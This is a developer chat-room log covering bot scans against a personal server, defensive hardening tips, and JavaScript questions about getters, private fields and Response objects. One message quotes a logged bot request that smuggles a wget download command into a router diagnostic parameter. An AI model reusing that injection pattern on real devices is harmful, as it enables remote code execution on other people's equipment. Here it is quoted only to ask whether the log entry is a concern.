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Have you a solution @Lady ?
@rlemon Its http.
still bots
and my answer still is true
@rlemon The only thing I have that is possibly vulnerable is phpMyAdmin but that is blocked unless it comes from
6 mins ago, by rlemon
and don't expose stupid endpoints with default passwords
then you have no worries
you can also change the endpoint of phpmyadmin to be non standard
the bots hit standard endpoints with default usernames and passwords
fyi http is giving them 302 and redirecting them to https where they get the 404 is that ok?
@rlemon Maybe the ISP will do something about it.
web scanning bots are mostly harmless
@JBis what can they possibly do?
don't set your password to 'password' and you'll be fine
the ips you see today will be different by tomorrow
Add a captcha
you can ban ranges, most of my 'attacks' come from Russia or China
and I have no care if someone wants to view my personal website from there
If they're submitting forms. Otherwise... Ignore them. Block them by refferer
but you can't really do anything about it
just protect yourself, and let them try
Most my experience with bots has been referrer spam bots
@rlemon Bleh. 3/4 of them from Russia. I aint lettin puttin in my shit
they are not smart attacks, they are looking for stupid servers
you can ignore them if you've protected your site reasonably.
it would be fun to honeypot them
Is this something Cloud Flare helps with?
I don't think so
@rlemon Thats what I figured just a bit worried when I saw this w00tw00t.at.blackhats.romanian.anti-sec and /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_bu‌​tton=nslookup_button&ping_ip=google.ca%20%3B%20wget%20http://‌​it
I get blocked by Cloud Flare on VPN networks generally
So I just assumed.
@JBis why would that make you nervous?
if you do the three things I suggested above, you're probably safe
cloudflare blocks a lot, but not everything
Our biggest problem was they would Jack up our webstats.
@JBis look through your log a little more and you'll find all sorts of presumptuous scary-sounding broadcasts that have been sent across the net
Can't have a bunch of spam bots when your webalizer is public and directly affects revenue
hundreds or thousands of requests a day from bots trying to access the server isn't uncommon
@rlemon Figured the first one was a callsign. And second one looked like it was trying to execute wget command.
you hope not to have it, but it exists wide spread
@JBis yes, they will try a lot of things
change ssh ports, remove password logins, and don't expose endpoints with default usernames and passwords
Yeah it was a huge pain for us. Most of ours had porn site referers, so we blocked shit loads of keywords related to those sites in referrers
If you genuinely came to our website from a pron site you'd get blocked. But that wasn't a large concern
if it's just bots trying to gain access, it isn't usually worth the effort to block them. just have minimal security so they can't get in
that's pretty amusing @LadyBird
Talking to me? In our case we had to keep our stats real
@LadyBird ohh yea, but you guys had a reason besides "scary"
@forresthopkinsa now you're talkin'!
Webalizer is way way outdated and a generally terrible tool for web stats. But it's what the boss wanted
Yeah I didn't care what they did. Just that they pumped up stats and that would be fraud when we sell ads based directly on those stats
@rlemon why change ssh ports? Simple port scan and boom exposed.
We sold web ad space by the week. No clicks, no impressions, just duration on the site
@rlemon how block they change Ip constantly? Like block Russia and China?
because when you're scanning the entire net, a 'simple port scan' becomes impossibly expensive
We sent no reports and made none available outside of Webalizer.
@JBis you can block ranges, idk how, but you can
We had a bizarre business...
@JBis because it's another deterrent and takes 3 seconds.
again, these are not smart bots
What's the backend? Blocking ranges is incredibly simple with .htaccess
they are opportunity bots
@JBis they're targeting machines that were spun up in the past five minutes where the admin hasn't had a chance to configure anything
they are not sophisticated at all.
Or where some idiot is running server software from 2004
clearly they must get a moderate success rate
It's the equivalent of a noob downloading Kali Linux and setting off a premade attack script on the general web
11-year-olds trying to run minecraft servers
Or extremely low effort per success. They don't have to do anything.
They take over your server and likely have it run the same scripts
1 message moved to Trash can
@hfbachri_ Please don't post unformatted code - hit Ctrl+K before sending, use up-arrow to edit messages, and see the faq. For posting large code blocks, use a paste site like gist.github.com, hastebin.com, pastie.org or a demo site like jsbin.com
Is this a good practice to write setter getter in es6?
Looks good to me.
right they keep silent and the botnet grows. Although nowadays I imagine they probably use botnets more for crypto than DDOS
@CapricaSix i did but dunno the format still messy
which is a little bit more noticeable
@BenjaminGruenbaum Slowly but surely
@copy good :)
Good luck
@forresthopkinsa on one hand I want to say yeah, for sure. But on the other... Most of this is probably still stemming from attacks started years and years ago, the self-distributing ones anyway
@hfbachri_ no
what are you hearing about immigration in sweden?
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@hfbachri_ Please don't post unformatted code - hit Ctrl+K before sending, use up-arrow to edit messages, and see the faq. For posting large code blocks, use a paste site like gist.github.com, hastebin.com, pastie.org or a demo site like jsbin.com
those are not getters / setters
@LadyBird yeah you're probably right there
@hfbachri_ read the bot's message and don't post unformatted code.
@BenjaminGruenbaum Thanks! How is peer5 doing?
class Venue_Model {

  constructor() {
  setNamaVenue(_nama_venue) {
    this.nama_venue = _nama_venue

  getNamaVenue() {
    return this.nama_venue

  setKeterangan(_keterangan) {
    this.keterangan = _keterangan

  getKeterangan() {
    return this.keterangan
I remember hearing that swedish people burnt down the houses of immigrants
@copy hard, but growing nicely
@hfbachri_ no it is not a good practice, also JavaScript has getters and setters
He's formatting it. This is a caprica problem
but now I'm hearing a friend saying that immigrants are a huge problem there and that sweden is fucked
class Foo {
  get Name() { }
  set Name(value) {}
@rlemon then how?
self-sustaining viruses from 1999 will still be chugging along in another 20 years too
class VenueModel { constructor(name) { this.name = name; } } // access set and get via .name
@forresthopkinsa thanks to HostGator and GoDaddy
@BenjaminGruenbaum i want my variable become "private"
that's messy
what a time to be alive
possible, but messy
@hfbachri_ then prefix # to it
It seems kinda pointless to use getters and setters in JS
room is really active today
They make sense when it's the right time to use them.
It usually isn't
@HelloWorldPeace you just haven't found uses yet then
@HelloWorldPeace tell that to mobx lol
Configuration based components can make great use of getters and setters
Although mobx switched to proxies, vue uses them heavily too
Mostly getters
I used one earlier to school Cereal :D
@HelloWorldPeace like most conventions, you typically only realize the need for it pretty far down the road
@BenjaminGruenbaum Vue is switching to proxies with v3
@BenjaminGruenbaum are u serious I can use #?
6 hours ago, by rlemon
Object.assign(window, { get a() { return Infinity }});
IMHO they are completely unneeded, but you can architect concise and more powerful code using them
@hfbachri_ Are you using babel or typescript?
need em for observer pattern
So people still learning... Nah, you shouldn't be using them. That's just my opinion
Same reason people say write a for loop when you're confused on how to use something like redude
I am leaving redude.
@hfbachri_ then you can't use it, just don't document the field or use typescript if you care about that sort of thing - or prefix it with an underscore some people do that
I still think people should learn them and how they work, otherwise you see mutations in a getter and life sucks
Expression getters and setters are where I start to no longer see uses
what's a redude?
reduce for dudes, duh
Nope, definitely redude, you typed it twice lol
you didn't understand the second one
I typed it the second time to say I liked the typo and will be leaving it.
he's leaving his typo because it's funny
language barrier
@LadyBird That didn't make much sense. Maybe you meant: woosh
do you guys think that fresh college grads or experience-only devs are better at functional purity
bros.redude((bro, guy) => bro.fistbump(guy), manliness); // LadyBird.redude
what is functional purity
Why would a fresh college grad even understand that question
don't they teach that in uni?
I don't know, I feel like it depends on how they were taught
I learned from #17 so idk.
@forresthopkinsa I don't think there is a difference one way or the other it's just something you can pick up
@KevinB function without side effects basically
idempotence, etc
what does that mean
you should be able to call a function with the same arguments a hundred times and get the same result every time
you could argue that it's a lack of global state
but I'm getting off topic
i mean... i'm having a hard time thinking of a function that wouldn't perform that way automagically, assuming it wasn't designed with the intent of changing on purpose (like .random)
my lecturer forces me to strictly follow OOP concept (encapsulation). I have implemented setter getter method. But still confuse how to declare private var in ES6?
it's a fundamental property of mutability
but those methods are designed for that purpose
I guess i don't get the purpose of your question.
functional purity means that a function has zero effects, excepting its return value
@hfbachri_ like I said, it's messy without other tools to make it happen
Benji has an answer that uses Symbol.
so list.add(element) doesn't change the list; it returns a new one
it's clever, but messy imo
Why is that even a concept?
why do you need private members?
just decorate them with an underscore or something and move on with life.
that's the starting concept for functional programming
seems useless
I guess this is a great case to study for my question then
@rlemon I follow encapsulation concept (data hiding)
do you have a lot of professional experience developing?
quick question
in fact, if you're not using modules (in some capacity) I don't see it being done in any clean way
i mean... i've been developing for 10 years, for the same company, on the same team
FB removed that awful video lol
awesome, this is super interesting
how come when i do Object.assign({}, response) from a response nothing comes back
are you mostly front-end? what languages do you work with?
@ChristianMatthew default response to {}
full stack, coldfusion, java, php, nodejs
@ChristianMatthew because the Response interface doesn't have anything useful to put in an object
super cool
lol it does
like what?
the whle terminology thing for computerscience is what has always turned me away from it
the response and url and other information
the point of immutability, functional purity, referential transparency, etc. is that it makes it a lot easier to follow the code
because i'll get asked "Do you know what X is?" and i'm like no... then they describe something i've been doing for years
yeah that's fair, I getcha
@KendallFrey fun problem: given 2 integer arrays of the same length, write a function that returns the rotation of the first array with a min sum of |a[i] - b[i]|, where rotation is shifting+pushing
@KevinB why have you stayed for a decade? Genuine curiousity
if you have a function initializeObject() then it's a lot easier to walk the code if it returns that object, rather than if it saves it to a global variable, you know?
side effects are hard to follow
I've put in 3 at my first Dev job. Over 3 here. Not sure what the future is
@LadyBird close to home, and lots of freedom
Makes sense. Good work/life balance
@LadyBird so this worked Object.assign(response, response)
pay is great for the location, but on the bottom end on a national level
that returns response :D
it's odd you can't set it to an empty default
I get an extra 6 days PTO if I stay a year and a half longer. That'd be nice
the only way I can think of doing it for now is with a brute force approach
@ChristianMatthew Wtf lmao
Object.assign(destination, sources...) returns destination
who wants to discuss functional programming with @KevinB
it's a fun conversation
but I've got to go, it's lunchtime
which is O(n²) if n is length of the arrays
i need to get back to copying data between spreadsheets
it's from a promise and it is iterating through
Why when I don't chose option on select input, it renders undefined and not " " ?
i dont' know if that has anything do to with it
@towc explain O notation in a paragraph? It's so simple but I don't usually grasp it
I was homeschooled.
@LadyBird guess you have to suffer now
I just meant I can blame my mom
@ChristianMatthew I don't think that's doing what you think it is
btw @LadyBird can you give me a sanity check? You'd consider yourself fairly conservative right, politically? How do you see immigration in sweden?
don't sugar coat it, I won't argue with you about it
just want to see what conservative people hear about it
I don't have a valuable opinion due to lack of knowledge on the subject.
that's what sensible people say. But pretend you're not
what did you hear?
Tbh I couldn't fit into either bucket tho, conservatives or what have you. I choose on every issue and land somewhere in the middle
again, not to argue, just want to know what kind of information you receive
I legitimately have heard nothing.
@LadyBird that's what almost everyone says (I'd think conservatives more than liberals, actually)
Maybe that's as valuable to hear as my opinion lol
@LadyBird ok, thanks
Well I have no TV, streaming only. I don't follow any news sources specifically.
@rlemon i think you're right
I know I am
but htere is something odd with the Resopnse object
Object.assign works with own values only. Response has nothing on its own
It'd be odd for me to hear about developing foreign issues unless it concerns the US
it seems
but regardless of that, your Object.assign(a,a) does nothing
it clones a onto a then returns a
you get the same object back you gave it
@LadyBird well, a friend from the US is using sweden as an argument to reducing immigration drastically in the US
what they hear is that sweden actually let in tons of murderers and rapists, and that can be seen in statistics
I am the one who always wanted to emmigrate tho. So yeah I'm pro immigration. Hell yeah. But through the proper channels when possible. Otherwise when it's a humanitarian crisis I am severely underqualified to make opinions.
but in my liberal environment, I hear that swedish people are burning down immigrant houses because they're xenophobes
I don't think we would do that here. We're way better than that.
I know better than to think that immigration comes with no issues, but after I look at the statistics, I don't see too much of what those friends are talking about
I'd be the first to stand in front of the immigrant neighbors house when the mob comes.
actually, the friend's issue is with political correctness, and how the swedish government doesn't want to be targeted by the citizens because they're not being pc
Response {type: "cors", url: "https:///navigation/rerts.png", redirected: false, status: 404, ok: false, â€¦}
why does this object have a name of Respnose
how can i access just the object.
that's the interface
IDK man. I think this is way outside my scope haha. I deal with practical issues and just try to make a good life for myself.
that is the object
I'm starting to have major doubts about the friendness of this friend
!!> Object.getOwnPropertyNames(new Response())
yes but how can i access the pure object
but it has no own properties
@rlemon "ReferenceError: Response is not defined"
and not the interface
you can't if you want to use Object.assign
it has nothing useful to pass on
you have to pull out the properties by hand
@ChristianMatthew Better question, what do you want to access from the object?
the url and ok
const { url, ok } = response;
lol, I was already typing out the same thing
but how do i add that to Object.assign
but at that point, you shouldn't be using Object.assign
Just make an new object
oh @Mosho isn't dead yet
how's life?
yea, but if you're destructuring just to wrap in another object to Object.assign, that's a lot more work than you probably need
let newObject = { url: response.url, ok: response.ok }
@jake you actually do that?
I tend to have a pluck util function
cool story
I do if there is no nesting.
i get it but why is it not wokring
I explained it like three times now
@towc life goes on
`const { url, ok } = response;
let newObject = { url, ok };
Hows that?
Object.assign copies only own values. the object you have doesn't have any. it inherits all its properties (I guess)
you can prove that with Object.getOwnPropertyNames(new Response())
it has nothing useful to send on
so it sends on nothing
Object.assign is making things harder than you need them to be
yea, idk why you need that.
just read the properties directly and use them
@rlemon You told them to yesterday 😉 and they latched on to the idea that they needed it.
@forresthopkinsa well thats meen
I mean, if I did, it was a different question yesterday :P
Same one, same Response object shinanigans
...also you should definitely call .json() just in case
well another reason i want it is to then do Object.keys(myObj).length
@rlemon Would having a secure ssh password ok instead of port change?
@JBis there is no point
passwordless login > password login
get your keys setup and don't look back
@rlemon How?
google passwordless login + whatever your server OS is
@rlemon But if I don't have my keys with me I'm screwed
@jake I see nothing of me recommending Object.assign
but chat search is shitty
@rlemon But how bad is a password login?
so seeings how it's 5pm and I don't care that much, I'll take your word for it
@rlemon You want me to carry around a flashdrive with keys on it wherever I go?
Q: SSH password vs. key authentication

Jan HudecI've usually been told that public key authentication is strongly preferred over password authentication for SSH. However our previous admin was against public keys and only issued passwords and took care to use different passwords for different servers (pwgen generated passwords; they are reason...

I want you to do whatever you wanna do
I'm just telling you what I think is best
but I'm out for now, gotta go pickup some carpet
memorize your keys
problem solved
@Mosho Thats insane
the average person can remember random text up to 10 chars (like a phone number)
@rlemon thanks for help!
@rlemon Sorry, I was wrong
yesterday, by towc
or just object.assign, if you're not using an array
@ChristianMatthew The things you are asking are indicative of an XY problem: meta.stackexchange.com/a/233676/341137
Object.keys(myObj).length, response[0].ok and Object.assign being used in this way means that you have made a wrong turn somewhere else.
Anyone know how to block all users without a user agent string?
details missing
@KevinB in .htaccess
Q: Need to make htaccess rule that blocks empty user agent unless the request contains a specific string

user3404153I want to block empty user agents for bad-bot reasons. So I had this rule: RewriteCond %{HTTP_USER_AGENT} ^-?$ RewriteRule ^ - [F] Now one of our customers uses an RSS aggregator whose request for his feed comes in as a "-" user agent... So I'm trying to add a condition to this rule that says...

@KevinB Thanks again.
i'm beggining to hate objects
which means i am beggining to hate programming
but javascript is almost nothing but objects
Why? Objects are great.
@ChristianMatthew Thats why we told you to not use those things, they have pointy bits on them.
if (@Christan.hatred > 9) { alert("Take a break and come back"); }
let me show you what worked
Wow this idiot has there router exposed:
Do I need to shield my eyes?
@JBis I see from your kali avatar that you are a 1337 hax0r, are you going to pwn them?!?
@jake I'm 1338 hax0r! Ok?! Stop getting me confused with my brother 1337. Just because he's a better hacker doesn't mean you have to through it in my face :(
Oh and for the record he stole the name from me
lol jk
gtg cya
thx for help
@jake polluting
unless you're using those values somewhere else
ok let me show you this
he's a leeb
one char away from being madara
@towc polluting what?
@jake local scope
not a big deal, I'm just being picky
if my function is called get urls, I thing its reasonable for those 2 vars to exist.
{batchTotal: 12, fileName: "https://vse-content.s3.amazonaws.com/vrd/prod/navigation/az.png", currentSize: 7451, totalSize: 7451, complete: true, …}
{batchTotal: 12, fileName: "https://vse-content.s3.amazonaws.com/vrd/prod/navigation/ca.png", currentSize: 13205, totalSize: 13205, complete: true, …}
{batchTotal: 12, fileName: "https://vse-content.s3.amazonaws.com/vrd/prod/navigation/co.png", curre
see context from other day
i get a group of objects like this
it is a group of objects that are date i say "interfaced" by the fileName... so each object is keyable by the filename... but they are a group of objects.
i want to create a group of objects just like that for each incoming filename.
sorry for each response
so if I get 3 responses it would be a 3 group object
in chromes this is what it looks like
let keyedStuffArray = stuffArray.map(thing => ({key: thing.fileName, object: thing}))
let keyToFind = 'https://vse-content.s3.amazonaws.com/vrd/prod/navigation/ha.png'
let foundThing = keyedStuffArray.find(obj => obj.key === keyToFind);
@ChristianMatthew But what you really need is a Map: developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/…

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